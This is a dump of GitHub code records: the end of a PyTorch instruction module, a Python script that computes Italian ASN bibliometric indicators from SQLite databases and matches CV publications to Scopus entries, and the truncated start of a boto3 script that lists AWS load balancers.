nn.Dropout(p=self.lstm_dropout)\n self.linear_drop = nn.Dropout(p=self.linear_dropout)\n\n def init_hidden(self, num_layer, batch_size, hidden_size):\n return (torch.zeros(num_layer, batch_size, hidden_size).to(self.device),\n torch.zeros(num_layer, batch_size, hidden_size).to(self.device))\n\n def encode_question(self, *args):\n # constituency tree or query_text\n pass\n\n def get_instruction(self, *args):\n # expected return : question_emb, attn_weight\n pass\n\n @staticmethod\n def get_node_emb(query_hidden_emb, action):\n '''\n\n :param query_hidden_emb: (batch_size, max_hyper, emb)\n :param action: (batch_size)\n :return: (batch_size, 1, emb)\n '''\n batch_size, max_hyper, _ = query_hidden_emb.size()\n row_idx = torch.arange(0, batch_size).type(torch.LongTensor)\n q_rep = query_hidden_emb[row_idx, action, :]\n return q_rep.unsqueeze(1)\n","repo_name":"RichardHGL/WSDM2021_NSM","sub_path":"NSM/Modules/Instruction/base_instruction.py","file_name":"base_instruction.py","file_ext":"py","file_size_in_byte":2130,"program_lang":"python","lang":"en","doc_type":"code","stars":115,"dataset":"github-code","pt":"67"} +{"seq_id":"1375309991","text":"import sqlite3\nfrom sqlite3 import Error\nfrom glob import glob\nimport json\nimport csv\nimport sys\nimport os\nimport string \n\nimport datetime\nimport time\nimport requests\nimport ast\nfrom glob import glob\nimport re\nfrom lxml import html\nimport urllib.parse\n\nimport conf\nimport apikeys\n\nfrom datetime import datetime\nfrom scholarmetrics import hindex\n\n\ndatabase = {\n\t\"01/B1\": \"../data/output/informatici_settori.db\",\n\t\"09/H1\": \"../data/output/informatici_settori.db\",\n\t\"13/D1\": \"../data/output/statistici_settori.db\",\n\t\"13/D2\": \"../data/output/statistici_settori.db\",\n\t\"13/D3\": \"../data/output/statistici_settori.db\",\n\t\"INFO\": \"../data/output/informatici.db\",\n\t\"STAT\": \"../data/output/statistici.db\"\n}\n\nASNtsvFiles_Indicatori = {\n\t\"INFO\": \"../data/output/informatici_indicatoriPoggi_inCV.tsv\",\n\t\"STAT\": \"../data/output/statistici_indicatoriPoggi_inCV.tsv\"\n}\n\nASNtsvFiles_Titoli = {\n\t\"INFO\": \"../data/output/informatici_titoliPoggi.tsv\",\n\t\"STAT\": \"../data/output/statistici_titoliPoggi.tsv\"\n}\n\nsectors = ['01/B1','09/H1',\"INFO\",\"13/D1\",\"13/D2\",\"13/D3\",\"STAT\"]\n\n# Session dates ASN 2016-2018: 2016-12-02 2017-04-03 2017-08-04 2017-12-05 2018-04-06\n\"\"\"D.M. 7 giugno 2016, n. 120, Art. 2:\n\t...dal 1° gennaio rispettivamente del decimo anno (prima fascia) e del quinto anno (seconda fascia) precedente la scadenza del quadrimestre di presentazione della domanda;\"\"\"\nASN2016deadlines_i1 = {\n\t\"start\": {\n\t\t1: {1: \"2006-01-01\", 2: \"2007-01-01\", 3: \"2007-01-01\", 4: \"2007-01-01\", 5: \"2008-01-01\"},\n\t\t2: {1: \"2011-01-01\", 2: \"2012-01-01\", 3: \"2012-01-01\", 4: \"2012-01-01\", 5: \"2013-01-01\"}\n\t},\n\t\"end\": {1: \"2016-12-02\", 2: \"2017-04-03\", 3: \"2017-08-04\", 4: \"2017-12-05\", 5: \"2018-04-06\"}\n}\n\nASN2016deadlines_i2_i3 = {\n\t\"start\": {\n\t\t1: {1: \"2001-01-01\", 2: \"2002-01-01\", 3: \"2002-01-01\", 4: \"2002-01-01\", 5: \"2003-01-01\"},\n\t\t2: {1: \"2006-01-01\", 2: \"2007-01-01\", 3: \"2007-01-01\", 4: \"2007-01-01\", 5: \"2008-01-01\"}\n\t},\n\t\"end\": {1: \"2016-12-02\", 2: \"2017-04-03\", 3: \"2017-08-04\", 4: \"2017-12-05\", 5: \"2018-04-06\"}\n}\n\nstrDays = \"+30\"\njsonFolderCv = \"../data/input/mobiliti/JSON/\" \n\ndef create_connection(db_file):\n\t\"\"\" create a database connection to the SQLite database\n\t\tspecified by the db_file\n\t:param db_file: database file\n\t:return: Connection object or None\n\t\"\"\"\n\tconn = None\n\ttry:\n\t\tconn = sqlite3.connect(db_file)\n\texcept Error as e:\n\t\tprint(e)\n \n\treturn conn\n\n\ndef create_table(conn, create_table_sql):\n\t\"\"\" create a table from the create_table_sql statement\n\t:param conn: Connection object\n\t:param create_table_sql: a CREATE TABLE statement\n\t:return:\n\t\"\"\"\n\ttry:\n\t\tc = conn.cursor()\n\t\tc.execute(create_table_sql)\n\texcept Error as e:\n\t\tprint(e)\n\n\ndef select_cvid(conn):\n\n\tquery_publications = \"\"\"\n\t\tSELECT DISTINCT id, authorId, settore, quadrimestre, fascia, bibl, I1, I2, I3\n\t\tFROM curriculum\n\t\"\"\"\n\n\tcur = conn.cursor()\n\tcur.execute(query_publications)\n\trows = cur.fetchall()\n\treturn rows\n\n\ndef select_titoli(conn):\n\n\tquery_publications = \"\"\"\n\t\tSELECT DISTINCT id, authorId, settore, quadrimestre, fascia, titoliCounter.'titolo-01', titoliCounter.'titolo-02', titoliCounter.'titolo-03', titoliCounter.'titolo-04', titoliCounter.'titolo-05', titoliCounter.'titolo-06', titoliCounter.'titolo-07', titoliCounter.'titolo-08', titoliCounter.'titolo-09', titoliCounter.'titolo-10', titoliCounter.'titolo-11'\n\t\tFROM curriculum\n\t\tINNER JOIN titoliCounter\n\t\tON\n\t\t curriculum.id = titoliCounter.cvId\n\t\"\"\"\n\n\tcur = conn.cursor()\n\tcur.execute(query_publications)\n\trows = cur.fetchall()\n\treturn rows\n\n\ndef select_i1_articles(conn, cvid, quadrimestre, fascia, ASN2016deadlines,strDays,allOrCv):\n\tif allOrCv == \"ALL\":\n\t\tq = \"\"\"\n\t\t\tSELECT DISTINCT curriculum.id, curriculum.authorId, publication.eid\n\t\t\tFROM curriculum\n\t\t\tINNER JOIN wroteRelation\n\t\t\tON\n\t\t\t curriculum.authorId = wroteRelation.authorId\n\t\t\tINNER JOIN publication\n\t\t\tON\n\t\t\t wroteRelation.eid = publication.eid\n\t\t\tWHERE curriculum.id = '{curriculumId}' AND \n\t\t\t publication.publicationDate BETWEEN date('{dateFrom}') AND date('{dateTo}', '{days} days') AND\n\t\t\t ( publication.subtypeDescription = 'Article' OR\n\t\t\t\tpublication.subtypeDescription = 'Article in Press' OR\n\t\t\t\tpublication.subtypeDescription = 'Review' OR\n\t\t\t\tpublication.subtypeDescription = 'Letter' OR\n\t\t\t\tpublication.subtypeDescription = 'Note' OR\n\t\t\t\tpublication.subtypeDescription = 'Short Survey' )\n\t\t\"\"\"\n\telif allOrCv == \"CV\":\n\t\tq = \"\"\"\n\t\t\tSELECT DISTINCT curriculum.id, curriculum.authorId, publication.eid\n\t\t\tFROM curriculum\n\t\t\tINNER JOIN wroteRelationIndexCv\n\t\t\tON\n\t\t\t curriculum.id = wroteRelationIndexCv.idCv\n\t\t\tINNER JOIN publication\n\t\t\tON\n\t\t\t wroteRelationIndexCv.eid = publication.eid\n\t\t\tWHERE \n\t\t\t curriculum.id = '{curriculumId}' AND \n\t\t\t publication.publicationDate BETWEEN date('{dateFrom}') AND date('{dateTo}', '{days} days') AND\n\t\t\t ( publication.subtypeDescription = 'Article' OR\n\t\t\t\tpublication.subtypeDescription = 'Article in Press' OR\n\t\t\t\tpublication.subtypeDescription = 'Review' OR\n\t\t\t\tpublication.subtypeDescription = 'Letter' OR\n\t\t\t\tpublication.subtypeDescription = 'Note' OR\n\t\t\t\tpublication.subtypeDescription = 'Short Survey' ) AND\n\t\t\t wroteRelationIndexCv.indexPubIndCv NOT NULL\n\t\t\"\"\"\t\t\n\telse:\n\t\tprint (\"ERROR in select_i1_articles(): unknown allOrCv parameter provided.\")\n\t\tsys.exit()\n\t\n\tcur = conn.cursor()\n\tcur.execute(q.format(curriculumId=cvid, days=strDays,dateFrom=ASN2016deadlines[\"start\"][fascia][quadrimestre], dateTo=ASN2016deadlines[\"end\"][quadrimestre]))\n\trows = cur.fetchall()\n\treturn rows\n\ndef select_publications(conn, cvid, quadrimestre,fascia,ASN2016deadlines,strDays,allOrCv):\n\tif allOrCv == \"ALL\":\n\t\tq = \"\"\"\n\t\t\tSELECT DISTINCT curriculum.id, curriculum.authorId, publication.eid, publication.publicationDate\n\t\t\tFROM curriculum\n\t\t\tINNER JOIN wroteRelation\n\t\t\tON\n\t\t\t curriculum.authorId = wroteRelation.authorId\n\t\t\tINNER JOIN publication\n\t\t\tON\n\t\t\t wroteRelation.eid = publication.eid\n\t\t\tWHERE curriculum.id = '{curriculumId}' AND\n\t\t\t publication.publicationDate BETWEEN date('{dateFrom}') AND date('{dateTo}', '{days} days')\n\t\t\"\"\"\n\telif allOrCv == \"CV\":\n\t\tq = \"\"\"\n\t\t\tSELECT DISTINCT curriculum.id, curriculum.authorId, publication.eid, publication.publicationDate\n\t\t\tFROM curriculum\n\t\t\tINNER JOIN wroteRelationIndexCv\n\t\t\tON\n\t\t\t curriculum.id = wroteRelationIndexCv.idCv\n\t\t\tINNER JOIN publication\n\t\t\tON\n\t\t\t wroteRelationIndexCv.eid = publication.eid\n\t\t\tWHERE curriculum.id = '{curriculumId}' AND\n\t\t\t publication.publicationDate BETWEEN date('{dateFrom}') AND date('{dateTo}', '{days} days') AND\n\t\t\t wroteRelationIndexCv.indexPubIndCv NOT NULL\n\t\t\"\"\"\n\telse:\n\t\tprint (\"ERROR in select_publications(): unknown allOrCv parameter provided.\")\n\t\tsys.exit()\n\t\n\tcur = conn.cursor()\n\tcur.execute(q.format(curriculumId=cvid, days=strDays, dateFrom=ASN2016deadlines[\"start\"][fascia][quadrimestre], dateTo=ASN2016deadlines[\"end\"][quadrimestre]))\n\trows = cur.fetchall()\n\treturn rows\n\n\ndef select_i2_numCitations(conn,eid,quadrimestre,fascia):\n\tq = \"\"\"\n\t\tSELECT *\n\t\tFROM citationCount\n\t\tWHERE eid = '{pubId}'\n\t\"\"\"\n\t\n\tcur = conn.cursor()\n\tcur.execute(q.format(pubId=eid))\n\trows = cur.fetchall()\n\tif len(rows) == 0:\n\t\t# missing citation record -> return 0\n\t\tprint (\"WARNING: select_i2_numCitations() - missing citation record for paper '%s' -> return 0 citations\" % eid)\n\t\treturn 0\n\telif len(rows) != 1:\n\t\tprint (\"ERROR: select_i2_numCitations() - returned %d citation record for paper '%s' -> Exit.\" % (len(rows),eid))\n\t\tsys.exit()\n\t\n\trow = rows[0]\n\tcitTot = row[2]\n\tcitPre2000 = row[3]\n\tcit2000 = row[4]\n\tcit2001 = row[5]\n\tcit2002 = row[6]\n\tcit2003 = row[7]\n\tcit2004 = row[8]\n\tcit2005 = row[9]\n\tcit2006 = row[10]\n\tcit2007 = row[11]\n\tcit2008 = row[12]\n\tcit2009 = row[13]\n\tcit2010 = row[14]\n\tcit2011 = row[15]\n\tcit2012 = row[16]\n\tcit2013 = row[17]\n\tcit2014 = row[18]\n\tcit2015 = row[19]\n\tcit2016 = row[20]\n\tcit2017 = row[21]\n\tcit2018 = row[22]\n\tcit2019 = row[23]\n\tcit2020 = row[24]\n\n\t# Session dates ASN 2016-2018: 2016-12-02 2017-04-03 2017-08-04 2017-12-05 2018-04-06\n\tif fascia == 1:\n\t\t# citazions in the last 15 years\n\t\tif quadrimestre == 1:\n\t\t\t# citazions between 2001 and 2016\n\t\t\tcit = citTot - (citPre2000 + cit2000 + cit2016 + cit2017 + cit2018 + cit2019 + cit2020)\n\t\telif quadrimestre == 5:\n\t\t\t# citazions between 2003 and 2018\n\t\t\tcit = citTot - (citPre2000 + cit2000 + cit2001 + cit2002 + cit2018 + cit2019 + cit2020)\n\t\telse:\n\t\t\t# citazions between 2002 and 2017\n\t\t\tcit = citTot - (citPre2000 + cit2000 + cit2001 + cit2017 + cit2018 + cit2019 + cit2020)\n\telse:\n\t\t# citazioni in the last 10 years\n\t\tif quadrimestre == 1:\n\t\t\t# citazions between 2006 and 2016\n\t\t\tcit = cit2006 + cit2007 + cit2008 + cit2009 + cit2010 + cit2011 + cit2012 + cit2013 + cit2014 + cit2015 \n\t\telif quadrimestre == 5:\n\t\t\t# citazions between 2008 and 2018\n\t\t\tcit = cit2008 + cit2009 + cit2010 + cit2011 + cit2012 + cit2013 + cit2014 + cit2015 + cit2016 + cit2017 \n\t\telse:\n\t\t\t# citazions between 2007 and 2017\n\t\t\tcit = cit2007 + cit2008 + cit2009 + cit2010 + cit2011 + cit2012 + cit2013 + cit2014 + cit2015 + cit2016 \n\treturn cit\n\n\ndef select_publications_citations(conn, cvid, quadrimestre,allOrCv):\n\tASNdeadlines = {1: \"2016-12-02\", 2: \"2017-04-03\", 3: \"2017-08-04\", 4: \"2017-12-05\", 5: \"2018-04-06\"}\n\tif allOrCv == \"ALL\":\n\t\tq = \"\"\"\n\t\t\tSELECT DISTINCT curriculum.id, curriculum.authorId, publication.eid, citationCount.totalCitations, citationCount.'2017', citationCount.'2018', citationCount.'2019', citationCount.'2020' \n\t\t\tFROM curriculum\n\t\t\tINNER JOIN wroteRelation\n\t\t\tON\n\t\t\t curriculum.authorId = wroteRelation.authorId\n\t\t\tINNER JOIN publication\n\t\t\tON\n\t\t\t wroteRelation.eid = publication.eid\n\t\t\tINNER JOIN citationCount\n\t\t\tON\n\t\t\t publication.eid = citationCount.eid\n\t\t\tWHERE curriculum.id = '{curriculumId}' AND\n\t\t\t publication.publicationDate <= '{endDate}'\t \n\t\t\"\"\"\n\telif allOrCv == \"CV\":\n\t\tq = \"\"\"SELECT DISTINCT curriculum.id, curriculum.authorId, publication.eid, citationCount.totalCitations, citationCount.'2017', citationCount.'2018', citationCount.'2019', citationCount.'2020' \n\t\t\tFROM curriculum\n\t\t\tINNER JOIN wroteRelationIndexCv\n\t\t\tON\n\t\t\t curriculum.id = wroteRelationIndexCv.idCv\n\t\t\tINNER JOIN publication\n\t\t\tON\n\t\t\t wroteRelationIndexCv.eid = publication.eid\n\t\t\tINNER JOIN citationCount\n\t\t\tON\n\t\t\t publication.eid = citationCount.eid\n\t\t\tWHERE curriculum.id = '{curriculumId}' AND\n\t\t\t publication.publicationDate <= '{endDate}' AND\n\t\t\t wroteRelationIndexCv.indexPubIndCv NOT NULL\n\t\t\"\"\"\n\telse:\n\t\tprint (\"ERROR in select_publications_citations(): unknown allOrCv parameter provided.\")\n\t\tsys.exit()\n\tcur = conn.cursor()\n\tcur.execute(q.format(curriculumId=cvid, endDate=ASNdeadlines[quadrimestre]))\n\trows = cur.fetchall()\n\treturn rows\n\n\ndef computeASN2016Indicators(dbfile, outputTsvIndicatori,allOrCv=\"ALL\"):\n\t\"\"\"Art. 2\nValori-soglia degli indicatori per i candidati all'Abilitazione Scientifica Nazionale\n\n1. In attuazione di quanto disposto dall'art. 1, comma 1, e con riferimento all'Allegato C del D.M. 7 giugno 2016, n. 120, sono definiti nella Tabella 1, relativamente ai candidati all'abilitazione scientifica nazionale per i settori bibliometrici, i valori-soglia, distintamente per la prima e per la seconda fascia, dei seguenti indicatori:\n\na) il numero complessivo di articoli riportati nella domanda e pubblicati su riviste scientifiche contenute nelle banche dati internazionali \"Scopus\" e \"Web of Science\", rispettivamente nei dieci anni (prima fascia) e cinque anni (seconda fascia) precedenti, di seguito denominato \"numero articoli\". Per i candidati, ai fini del calcolo di tale indicatore, sono considerati gli articoli riportati nella domanda, pubblicati e rilevati nelle banche dati internazionali \"Scopus\" e \"Web of Science - Core Collection\" dal 1° gennaio rispettivamente del decimo anno (prima fascia) e del quinto anno (seconda fascia) precedente la scadenza del quadrimestre di presentazione della domanda;\n\nb) il numero di citazioni ricevute dalla produzione scientifica contenuta nella domanda, pubblicata e rilevata dalle banche dati internazionali \"Scopus\" e \"Web of Science\", rispettivamente nei quindici anni (prima fascia) e dieci anni (seconda fascia) precedenti, di seguito denominato \"numero citazioni\". Per i candidati, ai fini del calcolo di tale indicatore, sono considerate le citazioni della produzione scientifica contenuta nella domanda, pubblicata e rilevata nelle banche dati internazionali \"Scopus\" e \"Web of Science - Core Collection\" dal 1° gennaio rispettivamente del quindicesimo anno (prima fascia) e del decimo anno (seconda fascia) precedente la scadenza del quadrimestre di presentazione della domanda;\n\nc) l'indice h di Hirsch, calcolato sulla base delle citazioni rilevate dalle banche dati internazionali \"Scopus\" e \"Web of Science\" con riferimento alle pubblicazioni contenute nella domanda e pubblicate, rispettivamente, nei quindici anni (prima fascia) e dieci anni (seconda fascia) precedenti, di seguito denominato \"Indice H\". Per i candidati, ai fini del calcolo di tale indicatore, sono considerate le citazioni di cui alla lettera b) riferite alle pubblicazioni contenute nella domanda, pubblicate e rilevate nelle banche dati internazionali \"Scopus\" e \"Web of Science - Core Collection\" dal 1° gennaio rispettivamente del quindicesimo anno (prima fascia) e del decimo anno (seconda fascia) precedente la scadenza del quadrimestre di presentazione della domanda.\"\"\"\n\t\n\tconn = create_connection(dbfile)\n\twith conn:\n\t\trows = select_cvid(conn)\n\t\tdiffTotal = 0\n\t\tresStr = \"cvId\\tauthorId Scopus\\tsettore\\tquadrimestre\\tfascia\\tI1 poggi (journals)\\tI1 ASN\\tI2 poggi (citazioni)\\tI2 ASN\\tI3 poggi (hIndex)\\tI3 ASN\\tDelta I1\\tDelta I2\\tDelta I3\\n\"\n\t\tfor row in rows:\n\t\t\tcvid = row[0]\n\t\t\tprint (cvid)\n\t\t\tauthorId = row[1]\n\t\t\tsettore = row[2]\n\t\t\tquadrimestre = row[3]\n\t\t\tfascia = row[4]\n\t\t\tbibl = row[5]\n\t\t\ti1 = row[6]\n\t\t\ti2 = row[7]\n\t\t\ti3 = row[8]\n\t\t\t\n\t\t\t# Session dates ASN 2016-2018: 2016-12-02 2017-04-03 2017-08-04 2017-12-05 2018-04-06\t\n\t\t\tif quadrimestre != 47777:\n\t\t\t\tjournals = select_i1_articles(conn, cvid, quadrimestre, fascia,ASN2016deadlines_i1,strDays, allOrCv)\n\t\t\t\ti1Computed = len(journals)\n\t\t\t\tdiffI1 = i1Computed-i1\n\t\t\t\tdiffTotal += diffI1\n\t\t\t\t\n\t\t\t\tpublications = select_publications(conn,cvid,quadrimestre,fascia,ASN2016deadlines_i2_i3,strDays, allOrCv)\n\t\t\t\ti2Computed = 0\n\t\t\t\tfor publication in publications:\n\t\t\t\t\teid = publication[2]\n\t\t\t\t\tcitazioniPaper = select_i2_numCitations(conn,eid,quadrimestre,fascia)\n\t\t\t\t\ti2Computed += citazioniPaper\n\t\t\t\tdiffI2 = i2Computed-i2\n\t\t\t\t\n\t\t\t\tpublicationsHindex = select_publications_citations(conn, cvid, quadrimestre, allOrCv)\n\t\t\t\tcitationsArray = list()\n\t\t\t\tfor publication in publicationsHindex:\n\t\t\t\t\tif quadrimestre == 1:\n\t\t\t\t\t\ttotCitations = publication[3]\n\t\t\t\t\t\tcit2017 = publication[4]\n\t\t\t\t\t\tcit2018 = publication[5]\n\t\t\t\t\t\tcit2019 = publication[6]\n\t\t\t\t\t\tcit2020 = publication[7]\n\t\t\t\t\t\t\n\t\t\t\t\t\tcitCurrent = totCitations - (cit2017 + cit2018 + cit2019 + cit2020)\n\t\t\t\t\t\tcitationsArray.append(citCurrent)\n\t\t\t\t\telif quadrimestre == 5:\n\t\t\t\t\t\ttotCitations = publication[3]\n\t\t\t\t\t\tcit2018 = publication[5]\n\t\t\t\t\t\tcit2019 = publication[6]\n\t\t\t\t\t\tcit2020 = publication[7]\n\t\t\t\t\t\t\n\t\t\t\t\t\tcitCurrent = totCitations - (cit2018 + cit2019 + cit2020)\n\t\t\t\t\t\tcitationsArray.append(citCurrent)\n\t\t\t\t\telse:\n\t\t\t\t\t\ttotCitations = publication[3]\n\t\t\t\t\t\tcit2019 = publication[6]\n\t\t\t\t\t\tcit2020 = publication[7]\n\t\t\t\t\t\t\n\t\t\t\t\t\tcitCurrent = totCitations - (cit2019 + cit2020)\n\t\t\t\t\t\tcitationsArray.append(citCurrent)\n\t\t\t\ti3Computed = hindex(citationsArray)\n\t\t\t\tresStr += \"%s\\t%s\\t%s\\t%s\\t%s\\t%d\\t%d\\t%d\\t%d\\t%d\\t%d\\t%d\\t%d\\t%d\\n\" % (cvid, authorId, settore, quadrimestre, fascia, i1Computed, i1, i2Computed, i2, i3Computed, i3, i1Computed-i1, i2Computed-i2, i3Computed-i3)\n\t\tprint (diffTotal)\n\n\t\twith open(outputTsvIndicatori, \"w\") as text_file:\n\t\t\ttext_file.write(resStr)\n\t\t\t\n\ndef extractTitoliFromDb(dbfile, outputTsvTitoli):\n\tconn = create_connection(dbfile)\n\twith conn:\n\t\trows = select_titoli(conn)\n\t\tresStr = \"cvid\\tauthorId Scopus\\tsettore\\tquadrimestre\\tfascia\\ttitolo-01\\ttitolo-02\\ttitolo-03\\ttitolo-04\\ttitolo-05\\ttitolo-06\\ttitolo-07\\ttitolo-08\\ttitolo-09\\ttitolo-10\\ttitolo-11\\n\"\n\t\tfor row in rows:\n\t\t\tresStr += (\"\\t\".join(str(x) for x in row) + \"\\n\")\n\t\t\n\t\twith open(outputTsvTitoli, \"w\") as text_file:\n\t\t\ttext_file.write(resStr)\n\n\ndef select_pubsForUpdate(conn, cvid):\n\tquery_publications = \"\"\"\n\t\tSELECT publication.eid, publication.doi, publication.title, publication.venueName, wroteRelation.authorId\n\t\tFROM curriculum\n\t\tINNER JOIN wroteRelation\n\t\tON\n\t\t curriculum.authorId = wroteRelation.authorId\n\t\tINNER JOIN publication\n\t\tON\n\t\t wroteRelation.eid = publication.eid\n\t\tWHERE curriculum.id = '{curriculumId}'\n\t\"\"\"\n\tcur = conn.cursor()\n\tcur.execute(query_publications.format(curriculumId=cvid))\n\trows = cur.fetchall()\n\treturn rows\n\n\ndef lcs(X, Y, m, n): \n\tL = [[0 for i in range(n + 1)] \n\t\t\tfor i in range(m + 1)] \n\t\t\t \n\t# Following steps build \n\t# L[m+1][n+1] in bottom \n\t# up fashion. Note that \n\t# L[i][j] contains length \n\t# of LCS of X[0..i-1] and Y[0..j-1] \n\tfor i in range(m + 1): \n\t\tfor j in range(n + 1): \n\t\t\tif i == 0 or j == 0: \n\t\t\t\tL[i][j] = 0\n\t\t\telif X[i - 1] == Y[j - 1]: \n\t\t\t\tL[i][j] = L[i - 1][j - 1] + 1\n\t\t\telse: \n\t\t\t\tL[i][j] = max(L[i - 1][j], \n\t\t\t\t\t\t\t L[i][j - 1]) \n\t\t# L[m][n] contains length of \n\t\t# LCS for X[0..n-1] and Y[0..m-1] \n\treturn L[m][n] \n\t \n# Returns cost of making X[] \n# and Y[] identical. costX is \n# cost of removing a character \n# from X[] and costY is cost \n# of removing a character from Y[] \ndef findMinCost(X, Y, costX, costY): \n\t \n\t# Find LCS of X[] and Y[] \n\tm = len(X) \n\tn = len(Y) \n\tlen_LCS =lcs(X, Y, m, n) \n\t \n\t# Cost of making two strings \n\t# identical is SUM of following two \n\t# 1) Cost of removing extra \n\t# characters from first string \n\t# 2) Cost of removing extra \n\t# characters from second string \n\treturn (costX * (m - len_LCS) +\n\t\t\tcostY * (n - len_LCS)) \n\n\ndef match(cvPub, scopusPubs,minTitleLength=18,maxDifferenceCost=15):\n\t#index_cvPub = cvPub[\"id\"]\n\ttemp = (\" \".join(cvPub[\"rawcontent\"]))\n\ttext_cvPub = ''.join(x for x in temp if x.isalpha()).lower()\n\t\n\tfor scopusPub in scopusPubs:\n\t\t# match DOI scopus in the cv \n\t\tif scopusPub[\"doi\"] is not None and str(scopusPub[\"doi\"]) in temp:\n\t\t\t#return index_cvPub\n\t\t\treturn scopusPub[\"eid\"]\n\n\tfor scopusPub in scopusPubs:\n\t\tscopusTitle = \"\".join(x for x in scopusPub[\"title\"] if x.isalpha()).lower()\n\t\ttry:\n\t\t\tscopusVenue = \"\".join(x for x in scopusPub[\"venue\"] if x.isalpha()).lower()\n\t\t\tif scopusTitle in text_cvPub and scopusVenue in text_cvPub:\n\t\t\t\treturn scopusPub[\"eid\"]\n\t\texcept:\n\t\t\tpass\n\t\tif scopusTitle in text_cvPub and len(scopusTitle) > minTitleLength:\n\t\t\treturn scopusPub[\"eid\"]\n\t\t\n\tfor scopusPub in scopusPubs:\n\t\tscopusTitle = \"\".join(x for x in scopusPub[\"title\"] if x.isalpha()).lower()\n\t\ttry:\n\t\t\ttitolo_cvPub = \"\".join(x for x in cvPub[\"parsed\"][\"titolo\"] if x.isalpha()).lower()\n\t\t\tif findMinCost(titolo_cvPub, scopusTitle,1,1) < maxDifferenceCost and len(scopusTitle) > minTitleLength:\n\t\t\t\treturn scopusPub[\"eid\"]\n\t\texcept:\n\t\t\tpass\n\treturn None\n\n\ndef create_wroteRelation_withIndex(conn, record):\n\t\"\"\"\n\tCreate a new wroteRelation record into the wroteRelationIndexCv table\n\t:param conn:\n\t:param record:\n\t:return: wroteRelationIndex id\n\t\"\"\"\n\tsql = ''' INSERT INTO wroteRelationIndexCv(idCv,authorId,eid,indexPubIndCv,totPubIndCv)\n\t\t\t VALUES(?,?,?,?,?) '''\n\tcur = conn.cursor()\n\tcur.execute(sql, record)\n\treturn cur.lastrowid\n\n\ndef removeEidFromScopusPubs(eidMatched,scopusPubs):\n\tfor scopusPub in scopusPubs:\n\t\tif scopusPub[\"eid\"] == eidMatched:\n\t\t\tscopusPubs.remove(scopusPub)\n\t\t\ndef updateDbPublicationInCv(dbfile):\n\tconn = create_connection(dbfile)\n\twith conn:\n\t\tsql_create_wroteRelationIndexCv_table = \"\"\" CREATE TABLE IF NOT EXISTS wroteRelationIndexCv (\n\t\t\t\t\t\t\t\t\t\tidCv integer NOT NULL,\n\t\t\t\t\t\t\t\t\t\tauthorId integer NOT NULL,\n\t\t\t\t\t\t\t\t\t\teid string,\n\t\t\t\t\t\t\t\t\t\tindexPubIndCv integer,\n\t\t\t\t\t\t\t\t\t\ttotPubIndCv integer,\n\t\t\t\t\t\t\t\t\t\tFOREIGN KEY (eid) REFERENCES authorScopus(id),\n\t\t\t\t\t\t\t\t\t\tFOREIGN KEY (eid) REFERENCES publication(eid)\n\t\t\t\t\t\t\t\t\t); \"\"\"\n\t\tcreate_table(conn, sql_create_wroteRelationIndexCv_table)\n\t\t\n\t\tcandidati = select_cvid(conn)\n\t\tprint (len(candidati))\n\t\tfor candidato in candidati:\n\t\t\tidCv = str(candidato[0])\n\t\t\tauthorId = candidato[1]\n\t\t\tsettore = candidato[2]\n\t\t\tquadrimestre = str(candidato[3])\n\t\t\tfascia = str(candidato[4])\n\t\t\t\n\t\t\tfolder = jsonFolderCv + \"quadrimestre-\" + quadrimestre + \"/fascia-\" + fascia + \"/\" + settore.replace(\"/\",\"-\") + \"/CV/\" + idCv\n\t\t\tcontents = glob(folder + \"_*.json\")\n\t\t\tcontents.sort()\n\t\t\t\n\t\t\tfor filename in contents:\n\t\t\t\twith open(filename) as f:\n\t\t\t\t\tdata = json.load(f)\n\t\t\t\t\tcvPubs = data[\"pubbs_ind\"]\n\t\t\tnum_cvPubs = len(cvPubs)\n\t\t\tcvPubs_notMatched = list(cvPubs)\n\t\t\t\n\t\t\t# get Scopus pubs\n\t\t\tscopusPubs = list()\n\t\t\trows = select_pubsForUpdate(conn, idCv)\n\t\t\tfor row in rows:\n\t\t\t\teid = row[0]\n\t\t\t\tdoi = row[1]\n\t\t\t\ttitle = row[2]\n\t\t\t\tvenue = row[3]\n\t\t\t\tscopusPubs.append({'eid': eid, 'doi': doi, 'title': title, 'venue': venue})\n\t\t\t\n\t\t\tmatches = dict()\n\t\t\tnum_cvPubs_matched = 0\n\t\t\tfoundEids = list()\n\t\t\tfor cvPub in cvPubs:\n\t\t\t\teidMatched = match(cvPub, scopusPubs)\n\t\t\t\tindexInCv = cvPub[\"id\"]\n\t\t\t\tif eidMatched is not None: # and indexInCv != 0:\n\t\t\t\t\tnum_cvPubs_matched += 1\n\t\t\t\t\tcvPubs_notMatched.remove(cvPub)\n\n\t\t\t\t\tif eidMatched in foundEids:\n\t\t\t\t\t\tprint (\"ERROR in updateDbPublicationInCv() - eid %s already matched, current index = %s.\" % (eidMatched, indexInCv))\n\t\t\t\t\t\tprint (foundEids)\n\t\t\t\t\t\tprint (matches[eidMatched])\n\t\t\t\t\t\tsys.exit()\n\t\t\t\t\tremoveEidFromScopusPubs(eidMatched,scopusPubs)\n\t\t\t\t\tmatches[eidMatched] = indexInCv\n\t\t\t\t\tfoundEids.append(eidMatched)\n\n\t\t\tfor eid in matches.keys():\n\t\t\t\tindex = matches[eid]\n\t\t\t\ttupleWRI = (idCv,authorId,eid,index,num_cvPubs)\n\t\t\t\tcreate_wroteRelation_withIndex(conn,tupleWRI)\n\t\t\t\n\t\t\tfor scopusPub in scopusPubs:\n\t\t\t\teid = scopusPub[\"eid\"]\n\t\t\t\ttupleWRI = (idCv,authorId,eid,None,num_cvPubs)\n\t\t\t\tcreate_wroteRelation_withIndex(conn,tupleWRI)\n\t\t\t\t\t\n\t\t\tfor cvPub_notMatched in cvPubs_notMatched:\n\t\t\t\tprint (\"\\t\" + \" \".join(cvPub_notMatched[\"rawcontent\"]))\n\t\t\t\n\nfor sector in sectors:\n\tupdateDbPublicationInCv(database[sector])\n\t\n\tcomputeASN2016Indicators(database[sector],ASNtsvFiles_Indicatori[sector],\"CV\")\n\t\n\textractTitoliFromDb(database[sector],ASNtsvFiles_Titoli[sector])\n\n","repo_name":"DigitalDataLab/ASN16-18_CitationNetwork","sub_path":"script/07.computeASNIndexes.py","file_name":"07.computeASNIndexes.py","file_ext":"py","file_size_in_byte":22197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"71629319255","text":"import argparse\nimport boto3\n\ndef list_load_balancers(aws_profile):\n session = boto3.Session(profile_name=aws_profile)\n elbv2 = session.client('elbv2')\n\n response = elbv2.describe_load_balancers()\n\n for lb in response['LoadBalancers']:\n lb_name = lb['LoadBalancerName']\n lb_arn = lb['LoadBalancerArn']\n lb_dns = lb['DNSName']\n 